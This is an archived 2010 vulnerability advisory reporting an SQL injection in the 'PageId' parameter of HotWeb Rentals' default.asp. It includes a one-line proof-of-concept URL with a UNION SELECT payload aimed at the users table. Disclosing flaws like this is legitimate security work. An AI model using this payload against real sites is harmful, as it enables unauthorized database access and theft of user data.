HotWeb Rental SQL Injection

HotWeb Rental SQL Injection: Posted Dec 29, 2010; Authored by non-customers; HotWeb Rentals suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 8cb39327a8568ed7be92b8abe0f4a184346e1c420f665f031f8a779ffd5ccc6b; Download | Favorite | View

HotWeb Rental SQL Injection

HotWeb Rentals "PageId" SQL Injection Vulnerability

PRODUCT >>> http://www.hotwebscripts.co.uk/

Input passed to the "PageId" parameter in default.asp is not properly sanitised before being used in
SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC >>> default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users

-- 
non-customers crew | http://rock-madrid.com/




--

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

HotWeb Rental SQL Injection

HotWeb Rental SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HotWeb Rental SQL Injection

Share This

HotWeb Rental SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems